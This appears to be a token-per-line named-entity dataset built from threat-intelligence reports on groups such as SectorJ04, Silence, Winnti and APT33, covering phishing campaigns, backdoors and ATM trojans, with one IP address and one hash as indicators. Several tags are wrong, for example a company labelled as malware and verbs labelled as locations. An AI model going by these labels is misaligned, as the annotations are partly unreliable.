+Arabic O
+, O
+Korean O
+and O
+Italian O
+, O
+and O
+the O
+emails S-TOOL
+were O
+written O
+with O
+various O
+contents O
+, O
+including O
+remittance O
+card O
+, O
+invoice O
+and O
+tax O
+invoice O
+. O
+Spam O
+emails S-TOOL
+and O
+attachments O
+written O
+in O
+Chinese O
+were O
+found O
+in O
+May O
+, O
+and O
+the O
+SectorJ04 S-APT
+group O
+at O
+that O
+time O
+targeted O
+industrial O
+sectors O
+such O
+as O
+electronics S-IDTY
+and O
+telecommunications S-IDTY
+, O
+international S-IDTY
+schools O
+and O
+manufacturing S-IDTY
+. O
+In O
+addition O
+to O
+their O
+preexist O
+backdoor O
+, O
+ServHelper S-MAL
+and O
+FlawedAmmy S-MAL
+, O
+they O
+have O
+also O
+been O
+confirmed O
+to O
+use O
+the O
+backdoor O
+called O
+AdroMut S-MAL
+and O
+FlowerPippi S-MAL
+. O
+AdroMut O
+downloads O
+the O
+malware O
+ServHelper S-MAL
+and O
+FlawedAmmy S-MAL
+RAT O
+used O
+by O
+the O
+SectorJ04 S-APT
+group O
+from O
+the O
+attacker O
+server O
+and O
+simultaneously O
+performs O
+the O
+functions O
+of O
+a O
+backdoor O
+. O
+The O
+SectorJ04 S-APT
+group O
+, O
+which O
+has O
+been O
+utilizing O
+the O
+same O
+pattern O
+of O
+infection O
+and O
+the O
+same O
+malware O
+for O
+more O
+than O
+six O
+months O
+, O
+is O
+believed O
+to O
+be O
+attempting O
+to O
+change O
+its O
+infection O
+methods O
+such O
+as O
+downloading B-ACT
+malware E-ACT
+directly O
+from O
+malicious O
+documents O
+without O
+using O
+MSI O
+installation O
+files O
+, O
+changing S-ACT
+their O
+spam O
+email S-TOOL
+format O
+and O
+using O
+new O
+types O
+of O
+backdoor O
+. O
+Until O
+2019 S-TIME
+, O
+SectorJ04 S-APT
+group O
+had O
+carried O
+out O
+massive O
+website-based O
+hacking O
+activities O
+that O
+mainly O
+utilize O
+ransomware S-MAL
+and O
+banking B-MAL
+trojans E-MAL
+for O
+financial O
+profit O
+, O
+and O
+has O
+also O
+been O
+carrying O
+out O
+information B-ACT
+gathering I-ACT
+activities E-ACT
+to O
+secure O
+attack O
+resources O
+such O
+as O
+email S-TOOL
+accounts O
+and O
+system O
+login O
+information O
+from O
+users O
+since O
+2019 S-TIME
+. O
+The O
+SectorJ04 S-APT
+group O
+has O
+shown O
+a O
+pattern O
+of O
+hacking O
+activities O
+that O
+have O
+changed O
+from O
+targeted O
+attacks O
+to O
+a O
+large-scale O
+distribution B-ACT
+of I-ACT
+spam E-ACT
+. O
+This O
+allows O
+them O
+to O
+expand O
+their O
+range O
+of O
+targets O
+of O
+hacking O
+activities O
+for O
+financial O
+profit O
+, O
+and O
+in O
+this O
+regard O
+, O
+SectorJ04 S-APT
+group O
+has O
+been O
+found O
+to O
+have O
+hacked O
+into O
+a O
+company’s O
+internal O
+network O
+by O
+using O
+a O
+spear B-ACT
+phishing E-ACT
+email S-TOOL
+targeting O
+executives O
+and O
+employees O
+of O
+certain O
+South B-LOC
+Korean E-LOC
+companies S-IDTY
+around O
+February B-TIME
+2019 E-TIME
+. O
+SectorJ04 S-APT
+group O
+carried O
+out O
+intensive O
+hacking O
+on O
+various O
+industrial O
+sectors O
+, O
+including O
+South O
+Korea’s O
+media S-IDTY
+, O
+manufacturing S-IDTY
+and O
+universities S-IDTY
+, O
+around O
+February S-TIME
+and O
+March B-TIME
+2019 E-TIME
+. O
+SectorJ04 S-APT
+used O
+the O
+spear B-ACT
+phishing E-ACT
+email S-TOOL
+to O
+spread O
+malicious O
+Excel O
+or O
+malicious O
+Word S-TOOL
+files O
+, O
+and O
+downloaded O
+the O
+MSI O
+files O
+from O
+the O
+attacker’s S-APT
+server O
+when O
+the O
+malicious O
+documents O
+were O
+run O
+. O
+SectorJ04 S-APT
+group O
+conducted O
+hacking B-ACT
+activities E-ACT
+targeting O
+financial S-IDTY
+institutions O
+located O
+in O
+India S-LOC
+and O
+Hong B-LOC
+Kong E-LOC
+around O
+April B-TIME
+2019 E-TIME
+. O
+SectorJ04 S-APT
+group O
+carried O
+out O
+hacking O
+activities O
+targeting O
+financial S-IDTY
+institutions O
+located O
+in O
+Italy S-LOC
+and O
+other O
+countries O
+around O
+May B-TIME
+2019 E-TIME
+. O
+In O
+late O
+July S-TIME
+, O
+SectorJ04 S-APT
+group O
+used O
+FlawedAmmy O
+RAT O
+to O
+carry O
+out O
+hacking O
+attacks O
+on O
+companies O
+and O
+universities O
+in O
+sectors O
+such O
+as O
+education S-IDTY
+, O
+job B-IDTY
+openings E-IDTY
+, O
+real B-IDTY
+estate E-IDTY
+and O
+semiconductors S-IDTY
+in O
+South B-LOC
+Korea E-LOC
+. O
+In O
+early O
+August S-TIME
+, O
+the O
+SectorJ04 S-APT
+group O
+carried O
+out O
+extensive O
+hacking B-ACT
+activities E-ACT
+targeting O
+the O
+users O
+around O
+the O
+world O
+, O
+including O
+South B-LOC
+Korea E-LOC
+, O
+India S-LOC
+, O
+Britain S-LOC
+, O
+the O
+United B-LOC
+States E-LOC
+, O
+Germany S-LOC
+, O
+Canada S-LOC
+, O
+Argentina S-LOC
+, O
+Bangladesh S-LOC
+and O
+Hong B-LOC
+Kong E-LOC
+. O
+Spam B-ACT
+emails S-TOOL
+targeting O
+email S-TOOL
+accounts O
+used O
+in O
+the O
+integrated O
+mail O
+service O
+of O
+public O
+officials O
+were O
+also O
+found O
+in O
+the O
+hacking B-ACT
+activity E-ACT
+. O
+They O
+are O
+one O
+of O
+the O
+most O
+active O
+cyber O
+crime O
+groups S-APT
+in O
+2019 S-TIME
+, O
+and O
+they O
+often O
+modify O
+and O
+tweak O
+their O
+hacking O
+methods O
+and O
+perform O
+periodic O
+hacking S-ACT
+activities S-ACT
+. O
+Now O
+, O
+Silence S-APT
+is O
+one O
+of O
+the O
+most O
+active O
+threat O
+actors O
+targeting O
+the O
+financial S-IDTY
+sector O
+. O
+Since O
+we O
+released O
+our O
+original O
+report O
+, O
+Silence: S-APT
+Moving O
+into O
+the O
+darkside O
+, O
+the O
+confirmed O
+damage O
+from O
+Silence's O
+operations O
+has O
+increased O
+fivefold O
+compared O
+to O
+the O
+figures O
+in O
+Group-IB's S-SECTEAM
+initial O
+report O
+. O
+Silence S-APT
+started O
+by O
+targeting O
+organizations O
+in O
+Russia S-LOC
+, O
+gradually O
+shifting O
+their O
+focus O
+to O
+former B-LOC
+Soviet E-LOC
+countries O
+, O
+and O
+then O
+the O
+world O
+. O
+Silence S-APT
+also O
+started O
+using O
+Ivoke S-MAL
+, O
+a O
+fileless O
+loader O
+, O
+and O
+EDA B-MAL
+agent E-MAL
+, O
+both O
+written O
+in O
+PowerShell S-TOOL
+. O
+Silence O
+2.0: O
+Going B-SECTEAM
+Global E-SECTEAM
+is O
+an O
+extension O
+of O
+our O
+original O
+report: O
+Silence: O
+Moving O
+into O
+the O
+Darkside O
+which O
+remains O
+the O
+most O
+significant O
+contribution O
+to O
+the O
+research O
+on O
+the O
+group O
+and O
+is O
+the O
+first O
+such O
+report O
+to O
+reveal O
+Silence’s B-APT
+activity E-APT
+. O
+Since O
+the O
+report’s O
+release O
+in O
+September B-TIME
+2018 E-TIME
+, O
+Group-IB’s S-SECTEAM
+Threat O
+Intelligence O
+team O
+has O
+detected O
+16 O
+campaigns O
+targeting O
+banks S-IDTY
+launched O
+by O
+Silence S-APT
+. O
+Like O
+the O
+majority O
+of O
+APT O
+groups O
+, O
+Silence S-APT
+uses O
+phishing S-ACT
+as O
+their O
+infection O
+vector O
+. O
+In O
+the O
+last O
+successful B-ACT
+attack E-ACT
+described O
+in O
+Silence: O
+Moving O
+into O
+the O
+darkside O
+, O
+dated O
+April B-TIME
+2018 E-TIME
+, O
+the O
+hackers O
+siphoned O
+off O
+about O
+$150 O
+, O
+000 O
+through O
+ATMs O
+in O
+a O
+single O
+night O
+. O
+Prior O
+to O
+April B-TIME
+2018 E-TIME
+, O
+as O
+described O
+in O
+Group-IB’s S-APT
+Silence: O
+Moving O
+into O
+the O
+darkside O
+report O
+, O
+Silence’s O
+target O
+interests O
+were O
+primarily O
+limited O
+to O
+former B-LOC
+Soviet E-LOC
+and O
+Eastern B-LOC
+European E-LOC
+countries O
+including O
+Russia S-LOC
+, O
+Ukraine S-LOC
+, O
+Belarus S-LOC
+, O
+Azerbaijan S-LOC
+, O
+Poland S-LOC
+, O
+and O
+Kazakhstan S-LOC
+. O
+In O
+2018 S-TIME
+, O
+Silence S-APT
+conducted O
+test O
+campaigns O
+to O
+update O
+their O
+database O
+of O
+current O
+targets O
+and O
+expand O
+their O
+attack O
+geography O
+. O
+The O
+threat O
+actor’s S-APT
+emails S-TOOL
+usually O
+contain O
+a O
+picture O
+or O
+a O
+link O
+without O
+a O
+malicious B-FILE
+payload E-FILE
+and O
+are O
+sent O
+out O
+to O
+a O
+huge O
+recipient O
+database O
+of O
+up O
+to O
+85 O
+, O
+000 O
+users S-IDTY
+. O
+Silence S-APT
+has O
+conducted O
+at O
+least O
+three O
+campaigns O
+using O
+recon O
+emails S-TOOL
+, O
+followed O
+by O
+malicious B-ACT
+mail E-ACT
+sent O
+to O
+an O
+updated O
+recipient O
+list O
+. O
+Group-IB S-SECTEAM
+has O
+also O
+detected O
+recon B-FILE
+emails E-FILE
+sent O
+out O
+to O
+New S-LOC
+Zealand S-LOC
+. O
+Since O
+our O
+last O
+public O
+report O
+, O
+Silence S-APT
+has O
+sent O
+out O
+more O
+than O
+170 O
+, O
+000 O
+recon O
+emails S-TOOL
+to O
+banks S-IDTY
+in O
+Russia S-LOC
+, O
+the O
+former B-LOC
+Soviet E-LOC
+Union O
+, O
+Asia S-LOC
+and O
+Europe S-LOC
+. O
+In O
+November B-TIME
+2018 E-TIME
+, O
+Silence S-APT
+tried O
+their O
+hand O
+at O
+targeting O
+the O
+Asian B-IDTY
+market E-IDTY
+for O
+the O
+first O
+time O
+in O
+their O
+history O
+. O
+In O
+total O
+, O
+Silence S-APT
+sent O
+out O
+about O
+80 O
+, O
+000 O
+emails S-TOOL
+, O
+with O
+more O
+than O
+half O
+of O
+them O
+targeting O
+Taiwan S-LOC
+, O
+Malaysia S-LOC
+, O
+and O
+South B-LOC
+Korea E-LOC
+. O
+Prior O
+to O
+April B-TIME
+2018 E-TIME
+, O
+as O
+described O
+in O
+Group-IB’s S-APT
+Silence: O
+Moving O
+into O
+the O
+darkside O
+report O
+, O
+Silence’s S-APT
+target O
+interests O
+were O
+primarily O
+limited O
+to O
+former B-LOC
+Soviet E-LOC
+and O
+Eastern B-LOC
+European E-LOC
+countries O
+including O
+Russia S-LOC
+, O
+Ukraine S-LOC
+, O
+Belarus S-LOC
+, O
+Azerbaijan S-LOC
+, O
+Poland S-LOC
+, O
+and O
+Kazakhstan S-LOC
+. O
+From O
+16 B-TIME
+October I-TIME
+2018 E-TIME
+to O
+1 B-TIME
+January I-TIME
+2019 E-TIME
+, O
+Silence S-APT
+sent O
+out O
+about O
+84 O
+, O
+000 O
+emails S-TOOL
+in O
+Russia O
+alone O
+to O
+update O
+their O
+address O
+database O
+. O
+As O
+part O
+of O
+their O
+phishing S-ACT
+campaigns O
+, O
+silence S-APT
+still O
+uses O
+Microsoft S-IDTY
+Office O
+documents O
+with O
+macros O
+or O
+exploits O
+, O
+CHM O
+files O
+, O
+and O
+.lNK S-FILE
+shortcuts O
+as O
+malicious O
+attachments O
+. O
+
+In O
+the O
+former B-LOC
+Soviet E-LOC
+Union O
+, O
+Silence S-APT
+targeted O
+banks S-IDTY
+in O
+Kyrgyzstan S-LOC
+, O
+Kazakhstan S-LOC
+, O
+and O
+Ukraine S-LOC
+. O
+
+In O
+2019 S-TIME
+, O
+Group-IB S-SECTEAM
+also O
+observed O
+the O
+use O
+of O
+a O
+new O
+fileless O
+PowerShell S-TOOL
+loader O
+called O
+Ivoke S-FILE
+. O
+
+The O
+Silence.Main B-FILE
+Trojan E-FILE
+, O
+which O
+is O
+the O
+main O
+stage O
+of O
+the O
+attack O
+, O
+has O
+a O
+full O
+set O
+of O
+commands O
+to O
+control O
+a O
+compromised O
+computer O
+. O
+
+As O
+the O
+CnC O
+server O
+, O
+Silence S-APT
+use O
+CnC-3 B-MAL
+server E-MAL
+running O
+Windows S-OS
+, O
+from O
+which O
+they O
+send O
+commands O
+to O
+download O
+additional O
+modules O
+. O
+
+To O
+control O
+ATMs O
+, O
+the O
+group O
+uses O
+the O
+Atmosphere B-MAL
+Trojan E-MAL
+, O
+which O
+is O
+unique O
+to O
+Silence S-APT
+, O
+or O
+a O
+program O
+called O
+xfs-disp.exe S-MAL
+. O
+In O
+addition O
+, O
+Silence S-APT
+downloads O
+the O
+reverse O
+proxy O
+programs O
+Silence.ProxyBot S-MAL
+and O
+SilenceProxyBot.NET S-MAL
+, O
+which O
+are O
+described O
+in O
+detail O
+in O
+the O
+report O
+Silence: O
+moving O
+into O
+the O
+darkside O
+. O
+
+Analysis O
+of O
+the O
+emails S-TOOL
+has O
+shown O
+that O
+the O
+attachment O
+contains O
+an O
+exploit S-VULNAME
+for O
+the O
+CVE-2017-11882 B-VULID
+vulnerability S-VULNAME
+. O
+
+Group-IB S-SECTEAM
+specialists O
+tracked O
+a O
+massive O
+mailout O
+of O
+emails S-TOOL
+containing O
+a O
+malicious B-FILE
+Microsoft I-FILE
+Word I-FILE
+attachment I-FILE
+titled I-FILE
+Договор.doc” E-FILE
+[Contract.doc] S-FILE
+. O
+
+Silence S-APT
+sent O
+out O
+emails S-TOOL
+to O
+Russian S-LOC
+banks S-IDTY
+. O
+
+The O
+exploit S-VULNAME
+installs O
+Silence’s S-APT
+loader O
+, O
+designed O
+to O
+download O
+backdoors O
+and O
+other O
+malicious O
+programs O
+. O
+
+Silence S-APT
+conducted O
+a O
+massive O
+phishing S-ACT
+campaign O
+posing S-ACT
+as O
+the O
+Central B-IDTY
+Bank E-IDTY
+of O
+the O
+Russian S-LOC
+Federation O
+. O
+
+Group-IB S-SECTEAM
+specialists O
+have O
+established O
+that O
+the O
+aim O
+of O
+the O
+attack O
+was O
+to O
+deliver O
+and O
+launch O
+the O
+second O
+stage O
+of O
+Silence’s S-APT
+Trojan S-MAL
+, O
+known O
+as O
+Silence.MainModule S-MAL
+. O
+
+Silence S-APT
+attacked O
+financial S-IDTY
+organisations O
+in O
+the O
+UK S-LOC
+. O
+Silence S-APT
+conducted O
+the O
+first O
+stage O
+of O
+their O
+Asian S-LOC
+campaign O
+, O
+organising O
+a O
+massive O
+phishing E-ACT
+attack O
+aimed O
+at O
+receiving S-LOC
+an O
+up-to-date O
+list O
+of O
+current O
+recipients O
+in O
+different O
+countries O
+for O
+further O
+targeted O
+attacks O
+delivering S-LOC
+their O
+malicious O
+software O
+. O
+The O
+attackers S-APT
+used O
+the O
+server O
+deployed O
+on O
+6 B-TIME
+June I-TIME
+2019 E-TIME
+to O
+control O
+compromised O
+workstations O
+in O
+these O
+banks S-IDTY
+. O
+On O
+24 B-TIME
+March I-TIME
+2019 E-TIME
+, O
+Silence.ProxyBot S-MAL
+(
+MD5 S-ENCR
+2fe01a04d6beef14555b2cf9a717615c S-MD5
+) O
+was O
+uploaded O
+to O
+VirusTotal S-TOOL
+from O
+an O
+IP S-PROT
+address O
+in O
+Sri B-LOC
+Lanka E-LOC
+. O
+On O
+October S-TIME
+18th S-TIME
+, O
+2018 S-TIME
+, O
+the O
+group O
+sent O
+out O
+emails S-TOOL
+to O
+British S-LOC
+financial S-IDTY
+companies O
+as O
+part O
+of O
+their O
+preparatory O
+campaign O
+. O
+Group-IB S-SECTEAM
+experts O
+established O
+that O
+the O
+server O
+185.20.187.89 O
+started O
+functioning O
+no O
+later O
+than O
+28 B-TIME
+January I-TIME
+2019 E-TIME
+. O
+According O
+to O
+local O
+media O
+reports O
+, O
+in B-TIME
+2019 E-TIME
+Silence S-APT
+successfully O
+withdrew O
+money O
+from O
+the O
+Bangladeshi S-LOC
+bank S-IDTY
+twice O
+within O
+2 O
+months O
+. O
+To O
+do O
+this O
+, O
+the O
+actor O
+may O
+have O
+used O
+a O
+unique O
+tool O
+called O
+Atmosphere S-MAL
+, O
+a O
+Trojan S-MAL
+developed O
+by O
+Silence S-APT
+to O
+remotely O
+control O
+ATM O
+dispensers O
+, O
+or O
+a O
+similar O
+program O
+called O
+xfs-disp.exe S-FILE
+, O
+which O
+the O
+actor O
+may O
+have O
+used O
+in O
+their O
+attack O
+on O
+IT O
+Bank S-IDTY
+. O
+As O
+we O
+described O
+in O
+Silence: S-APT
+Moving O
+into O
+the O
+darkside O
+report O
+, O
+Silence S-APT
+has O
+experience O
+with O
+theft O
+using O
+compromised O
+card O
+processing O
+systems O
+. O
+In O
+February B-TIME
+2019 E-TIME
+, O
+Russian S-LOC
+media7 O
+reported O
+a O
+Silence B-ACT
+attack E-ACT
+on O
+IT O
+Bank O
+in O
+the O
+city O
+of O
+Omsk O
+. O
+On O
+16 B-TIME
+January I-TIME
+2019 E-TIME
+, O
+Silence S-APT
+sent O
+out O
+phishing B-ACT
+emails S-TOOL
+with O
+malicious O
+attachments O
+disguised O
+as O
+invitations O
+to O
+the O
+International O
+Financial S-IDTY
+Forum O
+iFin-2019 O
+. O
+
+Group-IB S-SECTEAM
+specialists O
+determined O
+that O
+the O
+email S-TOOL
+addresses O
+of O
+IT O
+bank S-IDTY
+employees S-IDTY
+were O
+among O
+the O
+recipients O
+of O
+these O
+emails S-TOOL
+. O
+The O
+main O
+goal O
+of O
+Silence.Downloader S-FILE
+is O
+to O
+receive O
+an O
+executable O
+file O
+and O
+run O
+it O
+on O
+an O
+infected O
+machine O
+. O
+Silence.MainModule S-FILE
+is O
+a O
+typical O
+remote O
+control O
+Trojan S-MAL
+that O
+provides O
+access O
+to O
+the O
+command O
+shell O
+CMD.exe S-FILE
+with O
+the O
+possibility O
+of O
+downloading O
+files O
+from O
+remote O
+nodes O
+to O
+a O
+computer O
+and O
+uploading O
+files O
+from O
+a O
+computer O
+to O
+a O
+remote O
+server O
+. O
+Since O
+at O
+least O
+2011 S-TIME
+, O
+these O
+hackers O
+have O
+been O
+using O
+malware S-MAL
+to O
+spy O
+on O
+corporate O
+networks O
+. O
+Hackers S-APT
+are O
+targeting O
+high-tech B-IDTY
+companies E-IDTY
+as O
+well O
+as O
+chemical S-IDTY
+and O
+pharmaceutical S-IDTY
+companies O
+. O
+The O
+hackers O
+will O
+map O
+a O
+company’s O
+network O
+and O
+look O
+for O
+strategically O
+favorable O
+locations O
+for O
+placing O
+their O
+malware O
+. O
+The O
+corporation O
+conrms O
+the O
+Winnti S-APT
+incident O
+and O
+issues O
+the O
+following O
+statement: O
+The O
+cyberattack O
+was O
+discovered O
+in O
+the O
+summer O
+of O
+2014 S-TIME
+and O
+Henkel O
+promptly O
+took O
+all O
+necessary O
+precautions.” O
+Henkel O
+claims O
+that O
+a O
+very O
+small O
+portion” O
+of O
+its O
+worldwide O
+IT O
+systems O
+had O
+been O
+aected O
+— O
+the O
+systems O
+in O
+Germany S-LOC
+. O
+A O
+BASF O
+spokeswoman O
+tells O
+us O
+in O
+an O
+email S-TOOL
+that O
+in O
+July B-TIME
+2015 E-TIME
+, O
+hackers O
+had O
+successfully O
+overcome O
+the O
+rst O
+levels” O
+of O
+defense O
+. O
+The O
+tool O
+was O
+written O
+by O
+sta O
+of O
+Thyssenkrupp S-MAL
+, O
+because O
+the O
+industrial O
+giant—company O
+number O
+eleven—had O
+been O
+spied O
+on O
+by O
+Winnti S-APT
+. O
+Hackers S-APT
+are O
+charged O
+with O
+spying O
+on O
+a O
+manufacturer S-IDTY
+of O
+gas O
+turbines O
+. O
+The O
+Hong B-LOC
+Kong E-LOC
+government O
+was O
+spied O
+on O
+by O
+the O
+Winnti S-APT
+hackers O
+. O
+Komplex S-MAL
+is O
+a O
+backdoor O
+that O
+has O
+been O
+used O
+by O
+APT28 S-APT
+on O
+OS O
+X O
+and O
+appears O
+to O
+be O
+developed O
+in O
+a O
+similar O
+manner O
+to O
+XAgentOSX O
+. O
+While O
+OceanLotus’ S-APT
+targets O
+are O
+global O
+, O
+their O
+operations O
+are O
+mostly O
+active O
+within O
+the O
+APAC S-LOC
+region O
+which O
+encompasses O
+targeting O
+private O
+sectors O
+across O
+multiple O
+industries O
+, O
+foreign B-IDTY
+governments E-IDTY
+, O
+activists S-IDTY
+, O
+and O
+dissidents S-IDTY
+connected O
+to O
+Vietnam S-LOC
+. O
+NewsBeef S-APT
+attacks O
+against O
+Saudi B-LOC
+Arabian E-LOC
+organizations O
+and O
+individuals O
+are O
+likely O
+to O
+continue O
+. O
+Rapid7 S-SECTEAM
+discovered O
+that O
+additional O
+data O
+was O
+placed O
+into O
+the O
+Dropbox S-TOOL
+accounts O
+under O
+control O
+of O
+the O
+APT10 S-APT
+during O
+the O
+compromise O
+and O
+was O
+able O
+to O
+attribute O
+data O
+that O
+was O
+placed S-ACT
+into O
+it O
+as O
+being O
+owned O
+by O
+Visma O
+. O
+Rapid7 S-SECTEAM
+again O
+observed O
+APT10 S-APT
+dropping O
+payloads O
+named O
+ccSEUPDT.exe S-FILE
+. O
+These O
+RAT O
+families O
+are O
+discussed O
+in O
+Novetta’s S-SECTEAM
+other O
+report O
+on O
+the O
+Lazarus S-APT
+Group’s O
+RAT O
+and O
+Staging O
+capabilities O
+. O
+Magic B-APT
+Hound E-APT
+has O
+primarily O
+targeted O
+organizations O
+in O
+the O
+energy S-IDTY
+, O
+government S-IDTY
+, O
+and O
+technology S-IDTY
+sectors O
+that O
+are O
+either O
+based O
+or O
+have O
+business O
+interests O
+in O
+Saudi B-LOC
+Arabia E-LOC
+. O
+Since O
+at O
+least O
+2013 S-TIME
+, O
+the O
+Iranian S-LOC
+threat O
+group O
+that O
+FireEye S-SECTEAM
+tracks O
+as O
+APT33 S-APT
+has O
+carried O
+out O
+a O
+Cyber B-ACT
+Espionage E-ACT
+operation O
+to O
+collect O
+information O
+from O
+defense S-IDTY
+, O
+aerospace S-IDTY
+and O
+petrochemical S-IDTY
+organizations O
+. O
+CTU S-SECTEAM
+researchers O
+observed O
+likely O
+unsuccessful O
+phishing B-ACT
+campaigns E-ACT
+being O
+followed O
+by O
+highly O
+targeted O
+spearphishing S-ACT
+and O
+social B-ACT
+engineering I-ACT
+attacks E-ACT
+from O
+a O
+threat O
+actor O
+using O
+the O
+name O
+Mia B-APT
+Ash E-APT
+. O
+CTU S-SECTEAM
+researchers O
+conclude O
+that O
+COBALT B-APT
+GYPSY E-APT
+created O
+the O
+persona O
+to O
+gain O
+unauthorized O
+access O
+to O
+targeted O
+computer O
+networks O
+via O
+social B-ACT
+engineering E-ACT
+. O
+Characterized O
+by O
+relatively O
+unsophisticated O
+technical O
+merit O
+and O
+extensive O
+use O
+of O
+spear B-ACT
+phishing E-ACT
+, O
+the O
+Magic B-APT
+Hound E-APT
+targeted O
+individuals O
+and O
+organizations O
+in O
+the O
+Middle B-LOC
+East E-LOC
+, O
+as O
+well O
+as O
+across O
+Europe S-LOC
+and O
+in O
+the O
+United B-LOC
+States E-LOC
+. O
+These O
+malware S-FILE
+families O
+have O
+a O
+rich O
+history O
+of O
+being O
+used O
+in O
+many O
+targeted O
+attacks O
+against O
+government S-IDTY
+and O
+private S-IDTY
+organizations S-IDTY
+. O
+The O
+activity O
+surfaced O
+in O
+Southeast B-LOC
+Asia E-LOC
+, O
+a O
+region O
+where O
+APT10 S-APT
+frequently O
+operates O
+. O
+The O
+samples S-FILE
+we O
+analyzed O
+originated O
+from O
+the O
+Philippines S-LOC
+. O
+APT10 S-APT
+frequently O
+targets O
+the O
+Southeast B-LOC
+Asia E-LOC
+region O
+. O
+Both O
+of O
+the O
+loader’s O
+variants O
+and O
+their O
+various O
+payloads O
+that O
+enSilo S-SECTEAM
+analyzed O
+share O
+similar O
+Tactics O
+, O
+Techniques O
+, O
+and O
+Procedures O
+and O
+code O
+associated O
+with O
+APT10 S-APT
+. O
+Typically O
+, O
+APT10 S-APT
+tends O
+to O
+employ S-ACT
+a O
+namesquatting O
+scheme O
+in O
+their O
+domains O
+that O
+aims O
+to O
+confuse O
+the O
+observer O
+by O
+posing O
+as O
+a O
+legitimate O
+domain O
+. O
+Also O
+, O
+the O
+certificate O
+embedded O
+in O
+the O
+Quasar O
+sample S-FILE
+was O
+issued O
+at O
+22.12.2018 S-TIME
+, O
+which O
+correlates O
+with O
+the O
+file’s O
+compilation O
+date O
+. O
+Over O
+the O
+past O
+three O
+months O
+, O
+Recorded B-SECTEAM
+Future’s E-SECTEAM
+Insikt O
+Group O
+has O
+observed O
+an O
+increase O
+in O
+APT33’s S-APT
+also O
+known O
+as O
+Elfin S-APT
+infrastructure O
+building O
+and O
+targeting O
+activity O
+, O
+and O
+on O
+June B-TIME
+21 E-TIME
+, O
+2019 S-TIME
+, O
+Yahoo O
+. O
+News O
+reported O
+that O
+the O
+U.S. B-SECTEAM
+Cyber E-SECTEAM
+Command O
+launched O
+cyberattacks O
+on O
+an O
+Iranian O
+spy O
+group O
+. O
+Iranian S-LOC
+state-sponsored O
+threat O
+actor O
+APT33 S-APT
+has O
+been O
+conducting O
+cyberespionage O
+activity O
+since O
+at O
+least O
+2013 S-TIME
+, O
+predominantly O
+targeting O
+nations O
+in O
+the O
+Middle B-LOC
+East E-LOC
+, O
+but O
+also O
+notably O
+targeting O
+U.S. S-LOC
+, O
+South B-LOC
+Korean E-LOC
+, O
+and O
+European S-LOC
+commercial O
+entities O
+across O
+a O
+wide O
+variety O
+of O
+sectors O
+. O
+Our O
+research O
+found O
+that O
+APT33 S-APT
+, O
+or O
+a O
+closely O
+aligned O
+threat O
+actor O
+, O
+continues O
+to O
+conduct O
+and O
+prepare O
+for O
+widespread O
+cyberespionage O
+activity O
+, O
+with O
+over O
+1 O
+, O
+200 O
+domains O
+used O
+since O
+March B-TIME
+28 E-TIME
+, O
+2019 S-TIME
+and O
+with O
+a O
+strong O
+emphasis O
+on O
+using O
+commodity O
+malware O
+. O
+The O
+targeting O
+of O
+mainly O
+Saudi B-LOC
+Arabian E-LOC
+organizations O
+across O
+a O
+wide O
+variety O
+of O
+industries O
+aligns O
+with O
+historical O
+targeting O
+patterns O
+for O
+the O
+group O
+, O
+which O
+appear O
+undeterred O
+following O
+previous O
+exposés O
+of O
+their O
+activity O
+. O
+Towards O
+the O
+end O
+of O
+April B-TIME
+2019 E-TIME
+, O
+we O
+tracked O
+down O
+what O
+we O
+believe O
+to O
+be O
+new O
+activity O
+by O
+APT10 S-APT
+, O
+a O
+Chinese S-LOC
+Cyber B-ACT
+Espionage E-ACT
+group O
+. O
+Almost O
+60% O
+of O
+the O
+suspected O
+APT33 S-APT
+domains O
+that O
+were O
+classified O
+to O
+malware O
+families O
+related O
+to O
+njRAT S-MAL
+infections O
+, O
+a O
+RAT O
+not O
+previously O
+associated O
+with O
+APT33 S-APT
+activity O
+. O
+Other O
+commodity O
+RAT O
+malware O
+families O
+, O
+such O
+as O
+AdwindRAT S-MAL
+and O
+RevengeRAT S-MAL
+, O
+were O
+also O
+linked O
+to O
+suspected O
+APT33 S-APT
+domain O
+activity O
+. O
+APT33 S-APT
+is O
+an O
+Iranian S-LOC
+state-sponsored O
+threat O
+actor O
+that O
+has O
+engaged O
+in O
+cyberespionage O
+activities O
+since O
+at O
+least O
+2013 S-TIME
+. O
+Western S-LOC
+and O
+Saudi S-LOC
+organizations O
+in O
+industries O
+that O
+have O
+been O
+historically O
+targeted O
+by O
+APT33 S-APT
+should O
+be O
+monitoring O
+geopolitical O
+developments O
+and O
+increasing O
+the O
+scrutiny O
+of O
+operational O
+security O
+controls O
+focusing O
+on O
+detection O
+and O
+remediation O
+of O
+initial O
+unauthorized O
+access O
+, O
+specifically O
+from O
+phishing B-ACT
+campaigns E-ACT
+, O
+webshells S-TOOL
+. O
+Symantec’s S-SECTEAM
+Elfin S-APT
+report O
+denoted O
+additional O
+targeting O
+of O
+the O
+engineering S-IDTY
+, O
+chemical S-IDTY
+, O
+research E-IDTY
+, O
+finance E-IDTY
+, O
+IT O
+, O
+and O
+healthcare S-IDTY
+sectors O
+. O
+We O
+assess O
+that O
+the O
+recent O
+reporting O
+on O
+links O
+between O
+the O
+Nasr B-IDTY
+Institute E-IDTY
+and O
+Kavosh O
+Security O
+Group S-APT
+, O
+as O
+well O
+as O
+technical O
+and O
+persona O
+analysis O
+, O
+overlaps O
+among O
+APT33 S-APT
+, O
+APT35 S-APT
+, O
+and O
+MUDDYWATER S-APT
+, O
+and O
+is O
+probably O
+a O
+result O
+of O
+the O
+tiered O
+structure O
+that O
+Iran S-LOC
+utilizes O
+to O
+manage O
+cyber O
+operations O
+. O
+Recorded B-SECTEAM
+Future E-SECTEAM
+has O
+been O
+monitoring O
+APT33 S-APT
+activity O
+, O
+beginning O
+with O
+research O
+published O
+in O
+October B-TIME
+2017 E-TIME
+, O
+which O
+revealed O
+new O
+infrastructure O
+, O
+malware O
+hashes O
+, O
+and O
+TTPs O
+relating O
+to O
+the O
+threat O
+actor(s) O
+. O
+FireEye S-SECTEAM
+also O
+noted O
+in O
+their O
+2017 S-TIME
+report O
+that O
+the O
+online O
+handle O
+xman_1365_x O
+, O
+” O
+found O
+within O
+the O
+PDB O
+path O
+in O
+an O
+APT33 S-APT
+TURNEDUP O
+backdoor O
+sample O
+, O
+belonged O
+to O
+an O
+individual O
+at O
+the O
+Nasr O
+Institute O
+. O
+Recorded B-SECTEAM
+Future’s E-SECTEAM
+Insikt S-APT
+Group S-APT
+has O
+been O
+monitoring O
+APT33 S-APT
+activity O
+, O
+beginning O
+with O
+research O
+published O
+in O
+October B-TIME
+2017 E-TIME
+, O
+which O
+revealed O
+new O
+infrastructure O
+, O
+malware O
+hashes O
+, O
+and O
+TTPs O
